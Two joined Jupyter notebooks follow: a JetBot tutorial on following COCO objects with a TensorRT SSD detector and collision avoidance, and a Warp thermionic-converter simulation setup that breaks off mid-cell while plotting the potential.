###Markdown Object Following This notebook shows how to follow an object with JetBot. It builds on collision avoidance: the robot tracks an object while in the "free (go straight)" state. The detection model is an ssd_mobilenet_v2 model pre-trained on the [COCO dataset](http://cocodataset.org), which covers 90 common object classes. The model is used after conversion to TensorRT; because the TensorRT version differs between JetPack versions, the runtime environment must match the TensorRT version that was used for the conversion. The trackable objects are the classes the model learned from the COCO dataset, for example:* Person (index 1)* Cup (index 47)and many more (for the complete list of class indices, see the [label file](https://github.com/tensorflow/models/blob/master/research/object_detection/data/mscoco_complete_label_map.pbtxt)). Index 0 is background. Classification and detection models usually reserve a background label to represent the "nothing detected" state. The pre-trained model is based on the one published with the [Tensorflow Object Detection API](https://github.com/tensorflow/models/tree/master/research/object_detection) and has been converted to TensorRT in advance. You can also train on your own data with the ``Tensorflow Object Detection API`` on a desktop PC or a cloud server. Converting ssd_mobilenet_v2_coco to TensorRT makes the detection model run much faster, fast enough for real time on the Jetson Nano. However, this notebook does not cover training on the COCO dataset or other optimization steps. Also, because the TensorRT API changes frequently between versions, an ssd_mobilenet_v2_coco.engine that worked on a different JetPack version cannot be reused.> This notebook works on a JetBot built with a Jetson Nano 4GB and JetPack 4.3. > It has not been tested on the Jetson Nano 2GB (JetPack 4.4 or later) or the Jetson Nano 4GB with JetPack 4.4 or later. Let's get started. Preparing the camera Let's initialize the camera. The object detection model takes 300x300 pixel images as input, so we set the camera resolution to 300x300.> Internally, the Camera class uses GStreamer to take advantage of the Jetson Nano's image signal processor (ISP). This is incomparably faster than doing the resizing on the CPU. ###Code
########################################
# Load the libraries we will use.
########################################
from jetbot import Camera # Camera library provided for JetBot.

########################################
# Enable the camera.
# Images are resized to the pixel size given by width and height.
# ssd_mobilenet_v2_coco has a 300x300 input layer, so the camera image is resized to 300x300.
# The default fps is 21, but inference is coded to run on every camera frame update,
# which makes the processing heavy. We therefore set a small fps.
########################################
camera = Camera(width=300, height=300, fps=5)
###Output
_____no_output_____
###Markdown
Using the pre-trained SSD engine Import the [ObjectDetector](https://github.com/NVIDIA-AI-IOT/jetbot/blob/master/jetbot/object_detection.py) class and load ``ssd_mobilenet_v2_coco.engine``. Download [ssd_mobilenet_v2_coco.engine](https://drive.google.com/file/d/1KjlDMRD8uhgQmQK-nC2CZGHFTbq4qQQH/view) for JetPack 4.3 and upload ``ssd_mobilenet_v2_coco.engine`` to the same folder as this notebook in JupyterLab. Loading the SSD MobileNet V2 model ###Code
########################################
# Load the libraries we will use.
########################################
from jetbot import ObjectDetector # Object detection library provided for JetBot.

########################################
# Load the TensorRT object detection model.
########################################
model = ObjectDetector('ssd_mobilenet_v2_coco.engine')
###Output
_____no_output_____
###Markdown
Internally, the ``ObjectDetector`` class executes the model with the TensorRT Python API. It also preprocesses the model input and parses the detected objects. For now it only works with models created with the ``jetbot.ssd_tensorrt`` package. That package contains utilities for converting models from the Tensorflow Object Detection API into optimized TensorRT engines. Next, let's run the network on the camera input. By default the ``ObjectDetector`` class expects the ``bgr8`` format that the camera produces. If you want to feed it a different format, you can override the default preprocessing function. ###Code
########################################
# Load the libraries we will use.
########################################
import cv2

########################################
# Object detection uses a model trained with Tensorflow, and the model was trained on RGB images.
# ssd_mobilenet_v2_coco.engine is that model converted to TensorRT.
# Converting the input to RGB gives better accuracy,
# but the ObjectDetector class performs the BGR->RGB conversion itself,
# so in this notebook we pass the OpenCV camera image in BGR format as-is.
########################################
detections = model(camera.value)
print(detections) # Show the inference results.
###Output
_____no_output_____
###Markdown
If there are COCO objects in the camera image, their information is stored in the ``detections`` variable. Displaying detections in a text area Use the following code to show the information about the detected objects in a text area. ###Code
########################################
# Load the libraries we will use.
########################################
from IPython.display import display
import ipywidgets.widgets as widgets

detections_widget = widgets.Textarea() # Create a text widget.

detections_widget.value = str(detections) # Put the detected object information into the text widget.

display(detections_widget) # Show the text widget.
###Output
_____no_output_____
###Markdown
The label ID, confidence, and bounding box coordinates of each object detected in the camera image are displayed. As a leftover from mini-batch training, where several images are processed at once, the model also expects several images as input at prediction time. Since we only use a single camera here, the model input is an array holding one image. To show only the first object detected in the first image, you can call the following.> If no object is detected this raises an error, so we handle it with try-except ###Code
image_number = 0 # Index into the array of images given at inference time. We only passed one image, so this stays 0.
object_number = 0 # Index into the array of detected objects. If several objects were detected this can be non-zero. If nothing was detected the array is empty.

try:
    print(detections[image_number][object_number])
except:
    print("object not found")
###Output
_____no_output_____
###Markdown
Controlling the robot to follow the central object Next, let's make the robot follow an object of the specified class. To do this we proceed as follows 1. Detect objects that match the specified class. Check the [label file](https://github.com/tensorflow/models/blob/master/research/object_detection/data/mscoco_complete_label_map.pbtxt) for the label IDs and the objects they correspond to. 2. Select the object closest to the center of the camera's field of view. When it belongs to the specified class, this becomes the target to follow. 3. Steer the robot towards the target object. 4. Since collision avoidance is the base behavior, the robot turns left when it decides it is blocked by an obstacle.> There are several versions of the label file. The Tensorflow labels cover 80 objects, so some unnamed labels are included. [About the COCO dataset labels](https://tech.amikelive.com/node-718/what-object-categories-labels-are-in-coco-dataset/) We also create a few widgets used to set the target object's label and to control the robot's speed. `turn gain` controls how fast the robot turns based on the distance between the target object and the center of the robot's field of view. First we load the collision avoidance model. Following the collision avoidance example, we recommend using a model that works well in your actual environment. ###Code
########################################
# Load the libraries we will use.
########################################
import torch
import torchvision
import torch.nn.functional as F
import cv2
import numpy as np

########################################
# Load the collision avoidance model.
########################################
collision_model = torchvision.models.alexnet(pretrained=False)
collision_model.classifier[6] = torch.nn.Linear(collision_model.classifier[6].in_features, 2)
collision_model.load_state_dict(torch.load('../collision_avoidance/best_model.pth'))

########################################
# Run whatever can run on the GPU on the GPU.
# Put the model in evaluation mode.
# Convert the model to float16.
########################################
device = torch.device('cuda')
collision_model = collision_model.to(device)
collision_model = collision_model.eval().half()

########################################
# These values are the normalization parameters used for pytorch ImageNet training
# (scaling each RGB channel of the ImageNet dataset to mean 0 and standard deviation 1).
# It is best to normalize the camera image's RGB values with them.
# Since we do not use transforms.ToTensor() here, the RGB values before normalization lie in [0, 255].
# We therefore multiply the normalization parameters by 255.0 so the scaling matches the RGB ranges used in training.
########################################
mean = 255.0 * np.array([0.485, 0.456, 0.406])
stdev = 255.0 * np.array([0.229, 0.224, 0.225])

########################################
# Define the normalization function.
# Instantiating the torchvision.transforms.Normalize class gives
# the torch.nn.functional.normalize function.
# Source code:
# https://pytorch.org/docs/stable/_modules/torchvision/transforms/transforms.html#Normalize
# https://pytorch.org/docs/stable/_modules/torch/nn/functional.html#normalize
#########################################
normalize = torchvision.transforms.Normalize(mean, stdev)

########################################
# Convert the camera image into model input data.
########################################
def preprocess(camera_value):
    # Copy the camera image captured with OpenCV into the variable x.
    x = camera_value
    # Resize the image from 300x300 to 224x224.
    x = cv2.resize(x, (224, 224))
    # The training images were loaded with torchvision.datasets.ImageFolder, so the model was trained on RGB images.
    # The camera feed is read with OpenCV, so the image is in BGR format. Convert it to RGB.
    x = cv2.cvtColor(x, cv2.COLOR_BGR2RGB)
    # Convert the image layout from HWC to CHW.
    x = x.transpose((2, 0, 1))
    # Convert to float32.
    x = torch.from_numpy(x).float()
    # Normalize.
    x = normalize(x)
    # Use the GPU device. Convert to float16.
    x = x.to(device).half()
    # Turn it into a batch array.
    x = x[None, ...]
    # Return the input data x.
    return x
###Output
_____no_output_____
###Markdown
Create a robot instance to control the motors. ###Code
########################################
# Load the libraries we will use.
########################################
from jetbot import Robot # Library for controlling the JetBot.

########################################
# Instantiate the JetBot control class.
########################################
robot = Robot()
###Output
_____no_output_____
###Markdown
Create the control widgets and the function that runs the model on each camera update. ###Code
########################################
# Load the libraries we will use.
########################################
from jetbot import bgr8_to_jpeg # Image conversion library provided for JetBot.

########################################
# Slider that shows the probability of "blocked".
########################################
blocked_widget = widgets.FloatSlider(min=0.0, max=1.0, value=0.0, description='blocked')

########################################
# Widget for displaying the image.
# width and height are the width and height of the displayed widget.
# They do not have to match the camera image size.
########################################
image_widget = widgets.Image(format='jpeg', width=300, height=300)

########################################
# Widget for selecting the label name of the object to follow.
# The label names are the ones used by the trained model ssd_mobilenet_v2_coco.engine.
# We default the tracked target to person.
########################################
label_widget = widgets.Dropdown(
    options=['person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus', 'train', 'truck', 'boat', 'traffic light', 'fire hydrant', '12', 'stop sign', 'parking meter', 'bench', 'bird', 'cat', 'dog', 'horse', 'sheep', 'cow', 'elephant', 'bear', 'zebra', 'giraffe', '26', 'backpack', 'umbrella', '29', '30', 'handbag', 'tie', 'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball', 'kite', 'baseball bat', 'baseball glove', 'skateboard', 'surfboard', 'tennis racket', 'bottle', '45', 'wine glass', 'cup', 'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple', 'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza', 'donut', 'cake', 'chair', 'couch', 'potted plant', 'bed', '66', 'dining table', '68', '69', 'toilet', '71', 'tv', 'laptop', 'mouse', 'remote', 'keyboard', 'cell phone', 'microwave', 'oven', 'toaster', 'sink', 'refrigerator', '83', 'book', 'clock', 'vase', 'scissors', 'teddy bear', 'hair drier', 'toothbrush'],
    value='person',
    description='tracked label',
    disabled=False
)

########################################
# Slider widgets for tuning the JetBot's behavior.
########################################
speed_widget = widgets.FloatSlider(value=0.0, min=0.0, max=1.0, description='speed')
turn_gain_widget = widgets.FloatSlider(value=0.8, min=0.0, max=2.0, description='turn gain')

########################################
# Store the widget image size.
########################################
width = int(image_widget.width)
height = int(image_widget.height)

########################################
# Automatically scale the size of the drawn text.
########################################
fontScale = height/1000.0
if fontScale < 0.4:
    fontScale = 0.4
fontThickness = 1 + int(fontScale)
fontFace = cv2.FONT_HERSHEY_SIMPLEX

########################################
# Get the center coordinates (center_x, center_y) of a detected target,
# with the origin at the center of the camera image.
########################################
def detection_center(detection):
    bbox = detection['bbox']
    center_x = (bbox[0] + bbox[2]) / 2.0 - 0.5
    center_y = (bbox[1] + bbox[3]) / 2.0 - 0.5
    return (center_x, center_y)

########################################
# Get the distance from the center of the camera image to the center of the target.
########################################
def norm(vec):
    return np.sqrt(vec[0]**2 + vec[1]**2)

########################################
# Among several candidate targets, pick the one closest to the center of the frame.
########################################
def closest_detection(detections):
    closest_detection = None
    for det in detections:
        center = detection_center(det)
        if closest_detection is None:
            closest_detection = det
        elif norm(detection_center(det)) < norm(detection_center(closest_detection)):
            closest_detection = det
    return closest_detection

########################################
# Define what happens each time the camera image is updated.
########################################
def execute(change):
    # Copy the camera image into the variable image.
    image = change['new']
    
    ####################
    # Run the collision avoidance model and decide whether we are "blocked".
    ####################
    # Run inference.
    collision_output = collision_model(preprocess(image))
    # Calling collision_output.flatten() removes as many unnecessary dimensions as possible ([[blocked_rate, free_rate]] becomes [blocked_rate, free_rate]).
    # Apply softmax() so the output vector sums to 1 (turning it into a probability distribution).
    # The input is a batched, multi-dimensional array and the output matches it, which is why collision_output.flatten() is needed.
    # Then take collision_output.flatten()[0], the probability of "blocked". The probability of "free" would be collision_output.flatten()[1].
    prob_blocked = float(F.softmax(collision_output.flatten(), dim=0)[0])
    # Show the "blocked" probability on the slider.
    blocked_widget.value = prob_blocked
    
    ####################
    # If the probability of "blocked" exceeds 50%, turn left.
    # Update the image widget.
    # End this function here.
    ####################
    if prob_blocked > 0.5:
        robot.left(0.3)
        image_widget.value = bgr8_to_jpeg(image)
        return
        
    ####################
    # If the probability of "blocked" is 50% or less, i.e. "free", run object detection.
    ####################
    # The object detection code performs the BGR->RGB conversion internally,
    # so we pass the OpenCV camera image in BGR format as-is.
    detections = model(image)
    
    # Show information about the detected objects.
    display_str = []
    display_str.append("detection info")
    for det in detections[0]:
        # Inspect the detected objects one by one.
        if det['label'] == 0:
            # Label number 0 is the background, so skip it.
            # background. skip
            continue
        if det['confidence'] <= 0.2:
            # Low score. Here we pass and keep it as a detection, for inspection purposes.
            # bad score. skip
            #continue
            pass
        bbox = det['bbox'] # Get the x,y coordinates of the rectangle around the detected object.
        score = det['confidence'] # Get the score (probability) of the detected object.
        label = det['label'] # Get the label number of the detected object.
        cv2.rectangle(image, (int(width * bbox[0]), int(height * bbox[1])), (int(width * bbox[2]), int(height * bbox[3])), (255, 0, 0), 2) # Draw a blue rectangle around the detected object.
        display_str.append("label:{} score:{:.2f}".format(label_widget.options[int(label)-1], score)) # Append the label name and score to the list of strings.
        #cv2.putText(image, display_str, org=(10, 20+20*num_detection), fontFace=fontFace, fontScale=fontScale, thickness=fontThickness, color=(77, 255, 9))

    ####################
    # Draw the label names and scores of the detected objects on the image.
    # The drawing position and padding are computed from the image size and text length for readability.
    ####################
    max_text_width = 0
    max_text_height = 0
    if len(display_str) > 0:
        [(text_width, text_height), baseLine] = cv2.getTextSize(text=display_str[0], fontFace=fontFace, fontScale=fontScale, thickness=fontThickness)
        x_left = int(baseLine)
        y_top = int(baseLine)
        for i in range(len(display_str)):
            [(text_width, text_height), baseLine] = cv2.getTextSize(text=display_str[i], fontFace=fontFace, fontScale=fontScale, thickness=fontThickness)
            if max_text_width < text_width:
                max_text_width = text_width
            if max_text_height < text_height:
                max_text_height = text_height
        for i in range(len(display_str)):
            cv2.putText(image, display_str[i], org=(x_left, y_top + int(max_text_height*1.2 + (max_text_height*1.2 * i))), fontFace=fontFace, fontScale=fontScale, thickness=fontThickness, color=(77, 255, 9))

    ####################
    # If a detected object matches the tracked label, keep its information.
    # In the detection output, label number 0 is the background and 1 is the "person" label.
    # The dropdown list of the label widget excludes the background,
    # so its index 0 is the "person" label. Adding +1 to the widget index therefore matches the detection label numbers.
    ####################
    matching_detections = [d for d in detections[0] if d['label'] == int(label_widget.index)+1]
    
    ####################
    # Among the matching objects, track the one closest to the center of the frame.
    ####################
    target = closest_detection(matching_detections)

    ####################
    # If a target exists, draw a green rectangle around it.
    ####################
    if target is not None:
        bbox = target['bbox']
        cv2.rectangle(image, (int(width * bbox[0]), int(height * bbox[1])), (int(width * bbox[2]), int(height * bbox[3])), (0, 255, 0), 5)

    ####################
    # If no target exists, go forward, just like "free" in collision avoidance.
    ####################
    if target is None:
        robot.forward(float(speed_widget.value))
        
    ####################
    # If a target exists, drive the motors so the robot turns towards the center of the object.
    ####################
    else:
        center = detection_center(target)
        robot.set_motors(
            float(speed_widget.value + turn_gain_widget.value * center[0]),
            float(speed_widget.value - turn_gain_widget.value * center[0])
        )
        
    ####################
    # Update the image widget.
    ####################
    image_widget.value = bgr8_to_jpeg(image)
###Output
_____no_output_____
###Markdown
We created a function that goes all the way from model inference to JetBot motion. Now we need to run it whenever the camera image updates. JetBot implements the Camera class as a subclass of traitlets.HasTraits, so all we have to do is call observe(). Let's run the JetBot The following code creates a ``start jetbot`` button and a ``stop jetbot`` button. Pressing ``start jetbot`` initializes the model and the JetBot starts moving. Pressing ``stop jetbot`` stops the JetBot. Memory initialization happens on the first frame, so with any deep learning model the first frame takes a little longer to process. ###Code
########################################
# Load the libraries we will use.
########################################
import ipywidgets
import time

########################################
# Create the start and stop buttons.
########################################
model_start_button = ipywidgets.Button(description='start jetbot')
model_stop_button = ipywidgets.Button(description='stop jetbot')

########################################
# Define the function called when the start button is clicked.
########################################
def start_model(c):
    execute({'new': camera.value}) # Call execute() once to initialize.
    camera.observe(execute, names='value') # Call the given function whenever the Camera class's traitlets.Any() value variable (the camera image data) is updated.
model_start_button.on_click(start_model) # Call the given function when the start button is clicked.

########################################
# Define the function called when the stop button is clicked.
########################################
def stop_model(c):
    camera.unobserve(execute, names='value') # Stop running the function on camera image updates.
    time.sleep(1) # Wait a moment for in-flight processing to finish.
    robot.stop() # Stop the motors.
model_stop_button.on_click(stop_model) # Call the given function when the stop button is clicked.

########################################
# Define the widget display layout.
########################################
model_widget = ipywidgets.VBox([
    image_widget,
    ipywidgets.HBox([label_widget, blocked_widget]),
    ipywidgets.HBox([speed_widget, turn_gain_widget]),
    ipywidgets.HBox([model_start_button, model_stop_button])
])

########################################
# Show the widgets.
########################################
display(model_widget)
###Output
_____no_output_____
###Markdown
It moves! When the target is detected it is shown with a green box, and other detected objects are shown with blue boxes. When the collision avoidance model decides "blocked (turn)", the JetBot turns left. When the collision avoidance model decides "free (go straight)" and a target is detected, the JetBot moves to follow the target. When the collision avoidance model decides "free (go straight)" and no target is detected, it goes straight, just like collision avoidance. Stopping the camera Finally, stop the camera used in this notebook so that other notebooks can use it. ###Code
camera.stop() # Stop the camera.
###Output
_____no_output_____
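###Markdown
As a standalone sanity check of the steering rule used inside execute() above, here is a pure-Python sketch of the differential drive computation. No hardware is needed; the slider values and the target offset below are made-up example numbers. ###Code
# Differential steering: the target's x-offset (in [-0.5, 0.5]) is added to one wheel's
# speed and subtracted from the other's, turning the robot toward the target.
speed = 0.3      # example value of speed_widget
turn_gain = 0.8  # example value of turn_gain_widget (the notebook default)
center_x = 0.2   # made-up detection: target 20% of the frame width right of center

left_motor = speed + turn_gain * center_x   # 0.46 -> left wheel speeds up
right_motor = speed - turn_gain * center_x  # 0.14 -> right wheel slows down, robot turns right
print(left_motor, right_motor)
###Output
_____no_output_____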
examples/thermionic_energy_convertors/Enhanced_Warp_Thermionic_Converter.ipynb
###Markdown Enhanced features for a Simple Warp Interface for Thermionic Converters**5/10/2017**This version of the original "Develop_Warp_Thermionic_Converter" notebook includes additional features for improving the GUI for electrostatic simulations. These improvements include specific features for the simulation control palette in the visualization tab of the GUI:1. Isolated code to quickly compute a converged electric potential for the user-defined grid 2. A script to compute an estimated "expected" time of flight for an electron across the gap.5/10/2017Nathan Cook ###Code
%matplotlib inline
%load_ext autoreload
%autoreload 2
from __future__ import division
import sys
del sys.argv[1:] # Necessary to run 'from warp import *' in IPython notebook without conflict.
from warp import *
import numpy as np
import matplotlib.pyplot as plt
import os
import pickle
import h5py
from re import findall
from scipy.special import erfinv
from datetime import datetime
import rswarp
from warp.data_dumping.openpmd_diag import ParticleDiagnostic
from rswarp.diagnostics import FieldDiagnostic
from rswarp.utilities.file_utils import cleanupPrevious
from rswarp.utilities.file_utils import readparticles
from rswarp.utilities.file_utils import loadparticlefiles
from rswarp.cathode import sources
from rswarp.cathode import injectors
# Constants imports
from scipy.constants import e, m_e, c, k
kb_eV = 8.6173324e-5 #Boltzmann constant in eV/K
kb_J = k #Boltzmann constant in J/K
m = m_e
###Output
# Warp
# Origin date: Thu, 27 Apr 2017 22:31:05 +0000
# Local date: Thu, 27 Apr 2017 22:31:05 +0000
# Commit hash: 8d81829
# /Users/ncook/.virtualenvs/rswarp_env/lib/python2.7/site-packages/warp/warp.pyc
# /Users/ncook/.virtualenvs/rswarp_env/lib/python2.7/site-packages/warp/warpC.so
# Thu May 11 00:14:15 2017
# import warp time 0.246575117111 seconds
# For more help, type warphelp()
###Markdown
Diagnostics ###Code
diagDir = 'diags/xzsolver/hdf5/'
field_base_path = 'diags/fields/'
diagFDir = {'magnetic':'diags/fields/magnetic','electric':'diags/fields/electric'}
# Cleanup previous files
cleanupPrevious(diagDir,diagFDir)
###Output
_____no_output_____
###Markdown
Grid parametersThe grid parameters comprise one of the primary sets of user inputs, and are required for initializing the grid, pre-calculating fundamental currents, and generating the solver. These values are also used throughout visualization scripts.**'Physical' Grid Parameters. These are physically intuitive values for a simple domain specification:**1. `PLATE_SPACING` - The longitudinal distance (z-axis) between cathode and anode 2. `CHANNEL_WIDTH` - The transverse dimension of the simulation domain**Technical Grid Parameters. These provide the required inputs for constructing simulation objects, but may be computed from the physical parameters above for a simple rectangular geometry:**1. `X_MIN, X_MAX` - By default, the horizontal domain is `(-0.5*CHANNEL_WIDTH,0.5*CHANNEL_WIDTH)` 2. `Z_MIN, Z_MAX` - By default, the longitudinal domain is `[0, PLATE_SPACING]` 3. `Y_MIN, Y_MAX` - The ignorable plane, but specified for completeness. Defaults to +/- `(-0.5*CHANNEL_WIDTH,0.5*CHANNEL_WIDTH)` 4. `NUM_X` - The number of grid points along x. 5. `NUM_Y` - The number of grid points along y (ignorable for 2DXZ geometry). 6. `NUM_Z` - The number of grid points along z. ###Code
#GLOBAL GEOMETRY PARAMETERS FOR USERS
PLATE_SPACING = 10e-6 #plate spacing
CHANNEL_WIDTH = 110e-9 #width of simulation box
#Dimensions
X_MAX = CHANNEL_WIDTH*0.5
X_MIN = -1.*X_MAX
Y_MAX = CHANNEL_WIDTH*0.5
Y_MIN = -1.*Y_MAX
Z_MIN = 0.
Z_MAX = PLATE_SPACING
#Grid parameters
NUM_X = 11
NUM_Y = 64
NUM_Z = 512
#z step size
dz = (Z_MAX - Z_MIN)/NUM_Z
###Output
_____no_output_____
###Markdown
Solver Geometry and BoundariesThe solver geometry is a fundamental prerequisite for any interface or simulation setup. We will assume for now that we are fixing a 2D X-Z geometry, with the Y axis as an ignorable plane. **`w3d.solvergeom = w3d.XZgeom`**Future extensions to the interface will support 3D geometries. Where applicable and simple, small code snippets have been included in anticipation of this feature. However, by no means are these scripts fully compliant with 3D simulations. ###Code
#Specify solver geometry
w3d.solvergeom = w3d.XZgeom
assert w3d.solvergeom == w3d.XZgeom, \
'Solver geometry required to be w3d.XZgeom'
# Set boundary conditions
# Longitudinal conditions overridden by conducting plates
w3d.bound0 = neumann
w3d.boundnz = dirichlet
w3d.boundxy = periodic
# Particles boundary conditions
top.pbound0 = absorb
top.pboundnz = absorb
top.pboundxy = periodic
# Set grid boundaries
w3d.xmmin = X_MIN
w3d.xmmax = X_MAX
w3d.zmmin = 0.
w3d.zmmax = Z_MAX
# Set grid counts
w3d.nx = NUM_X
w3d.nz = NUM_Z
zmesh = np.linspace(0,Z_MAX,NUM_Z+1) #holds the z-axis grid points in an array
###Output
_____no_output_____
###Markdown
Source parameterizationThis section covers source parameterization, in particular how the electrons are emitted from the cathode. Warp permits several options; we want to support three of them. For simplicity, I've defined the `USER_INJECT` flag which corresponds to the three possible options:1. Constant emission - user specifies current. `USER_INJECT = 1` 2. Child-Langmuir emission (computed from geometries) - user selects and current is computed and displayed `USER_INJECT = 2` 3. Thermionic emission (computed from cathode temperature) - user selects and current is computed and displayed `USER_INJECT = 3`**Note that the following USER PARAMETERS are needed for the essential specification of the beam:**1. Instantiation via species command i.e. `beam = Species(type=Electron, name='beam')` 2. beam radii in x,y via a0, b0 (`beam.a0 = 0.5*BEAM_WIDTH`). In many cases, `BEAM_WIDTH = CHANNEL_WIDTH`. 3. beam current (`beam.ibeam = BEAM_CURRENT`) 4. Cathode temperature in Kelvin (`CATHODE_TEMP`). Should default to 4K. 5. Minimum z-coordinate for injected particles (`Z_PART_MIN`). Must have `Z_PART_MIN > Z_MIN`.**The next set of parameters are generated from additional user parameters (grid, beam, etc.):**1. The injection type for the instance of `top` (`top.inject = 6`). This will be set to 6 (user injection) for most cases, determined by the `USER_INJECT` switch. 2. Number of particles to be injected per step (`top.npinject`). This is computed from grid parameters and defaults to 10 particles per horizontal cell (e.g. `10*NUM_X`). 3. Injection coordinate determination - analytical vs. interpolated (`w3d.l_inj_exact`). Defaults to false for most injection types. 4. Variance of thermal particle velocity distribution in z (`beam.vthz`). Defaults to 0. 5. Variance of thermal particle velocity distribution in transverse plane (`beam.vthperp`). Defaults to 0. The `rswarp` repository has been updated with a cathode module to streamline the designation of cathode sources via each of these three methods.
Below we will demonstrate their use and provide a simple template. ###Code
#Cathode and anode settings
CATHODE_TEMP = 1273.15 #1100. #1273.15 #1000. #cathode temperature in K
CATHODE_PHI = 2.0 #work function in eV
ANODE_WF = 0.1
GRID_BIAS = 0.4 #voltage applied to any grid of electrodes
vacuum_level = CATHODE_PHI - ANODE_WF + GRID_BIAS
#compute beam cutoff velocity for time-step determinance
beam_beta = sources.compute_cutoff_beta(CATHODE_TEMP)
#Compute Child-Langmuir limit for this setup A/m^2
cl_limit = sources.cl_limit(CATHODE_PHI, ANODE_WF, GRID_BIAS, PLATE_SPACING)
#INJECTION SPECIFICATION
USER_INJECT = 1
# --- Setup simulation species
beam = Species(type=Electron, name='beam')
# --- Set basic beam parameters
SOURCE_RADIUS_1 = 0.5*CHANNEL_WIDTH #a0 parameter - X plane
SOURCE_RADIUS_2 = 0.5*CHANNEL_WIDTH #b0 parameter - Y plane
Z_PART_MIN = dz/8. #starting particle z value
#Compute cathode area for geometry-specific current calculations
if (w3d.solvergeom == w3d.XYZgeom):
    #For 3D cartesian geometry only
    cathode_area = 4.*SOURCE_RADIUS_1*SOURCE_RADIUS_2
else:
    #Assume 2D XZ geometry
    cathode_area = 2.*SOURCE_RADIUS_1*1. # 1 m is the geometric factor scaling the plane of the ignorable coordinate
#Set a default 'USER_CURRENT' to the Richardson-Dushman current in case of user-specified constant emission
#This will ultimately be an adjustable GUI parameter.
USER_CURRENT = cl_limit*cathode_area #sources.j_rd(CATHODE_TEMP,CATHODE_PHI)*cathode_area
# If true, position and angle of injected particle are computed analytically rather than interpolated
# Can be false for all but C-L injection (inject=2)
w3d.l_inj_exact = False
#Specify particles to be injected each step - 10 macro-particles per cell by default, USER SPECIFIED IN FUTURE
PTCL_PER_STEP = 10*NUM_X
top.npinject = PTCL_PER_STEP
# --- If using the XZ geometry, set so injection uses the same geometry
top.linj_rectangle = (w3d.solvergeom == w3d.XZgeom)
#Determine an appropriate time step based upon estimated final velocity
vzfinal = sqrt(2.*abs(vacuum_level)*np.abs(beam.charge)/beam.mass)+beam_beta*c
dt = dz/vzfinal #5e-15
top.dt = dt
if vzfinal*top.dt > dz:
    print "Time step dt = {:.3e}s does not constrain motion to a single cell".format(top.dt)
if USER_INJECT == 1:
    # Constant current density - beam transverse velocity fixed to zero, very small longitudinal velocity
    #Set injection flag
    top.inject = 6 # 1 means constant; 2 means space-charge limited injection;# 6 means user-specified
    beam.ibeam = USER_CURRENT
    beam.a0 = SOURCE_RADIUS_1
    beam.b0 = SOURCE_RADIUS_2
    #sources.constant_current(beam, CHANNEL_WIDTH, Z_PART_MIN, ptcl_per_step)
    myInjector = injectors.injectorUserDefined(beam, CATHODE_TEMP, CHANNEL_WIDTH, Z_PART_MIN, PTCL_PER_STEP)
    installuserinjection(myInjector.inject_constant)
if USER_INJECT == 2:
    # space charge limited injection using Child-Langmuir computation of cold limit
    #Set injection flag
    top.inject = 2 # 1 means constant; 2 means space-charge limited injection;# 6 means user-specified
    beam_current = sources.cl_limit(CATHODE_PHI, ANODE_WF, GRID_BIAS, PLATE_SPACING)*cathode_area
    beam.ibeam = beam_current
    beam.a0 = SOURCE_RADIUS_1
    beam.b0 = SOURCE_RADIUS_2
    w3d.l_inj_exact = True
elif USER_INJECT == 3:
    #Thermionic injection
    #Set injection flag
    top.inject = 6 # 1 means constant; 2 means space-charge limited injection;# 6 means user-specified
    beam_current = sources.j_rd(CATHODE_TEMP,CATHODE_PHI)*cathode_area #steady state current in Amps
    beam.ibeam = beam_current
    beam.a0 = SOURCE_RADIUS_1
    beam.b0 = SOURCE_RADIUS_2
    myInjector = injectors.injectorUserDefined(beam, CATHODE_TEMP, CHANNEL_WIDTH, Z_PART_MIN, PTCL_PER_STEP)
    installuserinjection(myInjector.inject_thermionic)
# These must be set for user injection
top.ainject = 1.0
top.binject = 1.0
derivqty()
###Output
_____no_output_____
###Markdown
Create solver ###Code
# Set up fieldsolver
f3d.mgtol = 1e-6 # Multigrid solver convergence tolerance, in volts. 1 uV is default in Warp.
solverE = MultiGrid2D()
registersolver(solverE)
###Output
_____no_output_____
###Markdown
Install conductors ###Code
# --- Emitter settings
extractor_voltage = vacuum_level
# --- Anode Location
zplate = Z_MAX#1e-6 # --- plate location
# Create source conductors
source = ZPlane(zcent=w3d.zmmin,zsign=-1.,voltage=0.)
installconductor(source, dfill=largepos)
# Create ground plate
plate = ZPlane(voltage=extractor_voltage, zcent=zplate)
installconductor(plate,dfill=largepos)
# Setup the particle scraper
scraper = ParticleScraper([source, plate])
###Output
_____no_output_____
###Markdown
Define diagnostics ###Code
particleperiod = 100
particle_diagnostic_0 = ParticleDiagnostic(period = particleperiod, top = top, w3d = w3d,
                                           species = {species.name: species for species in listofallspecies},
                                           comm_world=comm_world, lparallel_output=False, write_dir = diagDir[:-5])
fieldperiod = 100
efield_diagnostic_0 = FieldDiagnostic.ElectrostaticFields(solver=solverE, top=top, w3d=w3d, comm_world = comm_world,
                                                          period=fieldperiod)
installafterstep(particle_diagnostic_0.write)
installafterstep(efield_diagnostic_0.write)
###Output
_____no_output_____
###Markdown
UPDATED - Generate simulation package and plot potentialThis call has been updated to allow for plotting of the electrostatic potential. Rather than calling generate with its default parameters, the `mgmaxiters` parameter is set to a large value (12000) to allow the initial solve called by generate to produce a potential that has converged to the geometry. After `generate()` is finished, the parameter is reset to its default of 100. ###Code
#prevent GIST from starting upon setup
top.lprntpara = false
top.lpsplots = false
top.verbosity = 0 # Reduce solver verbosity
solverE.mgverbose = 0 #further reduce output upon stepping - prevents websocket timeouts in Jupyter notebook
#Adjusting the multigrid parameter here improves convergence speed
omega = 2./(1. + np.sin(np.pi/min(NUM_X+1,NUM_Z+1)))
solverE.mgparam = omega
solverE.mgmaxiters = 12000 #rough approximation needed for initial solve to converge
package("w3d")
generate()
solverE.mgmaxiters = 100
###Output
*** particle simulation package W3D generating
--- Resetting lattice array sizes
--- Allocating space for particles
--- Loading particles
--- Setting charge density
--- done
--- Allocating Win_Moments
--- Allocating Z_Moments
--- Allocating Lab_Moments
Multigrid2d: Max. # of iterations reached
Multigrid2d: Error converged to 6.663E-06 in 12000 v-cycles
###Markdown
UPDATED - Now plot the potential ###Code
#Need to compute the potential first
potential = solverE.getphi()
#Now plot
fig = plt.figure(figsize=(12,6))
X_CELLS = NUM_X
Z_CELLS = NUM_Z
potential = solverE.getphi()
xl = 0
xu = NUM_X
zl = 0
zu = NUM_Z
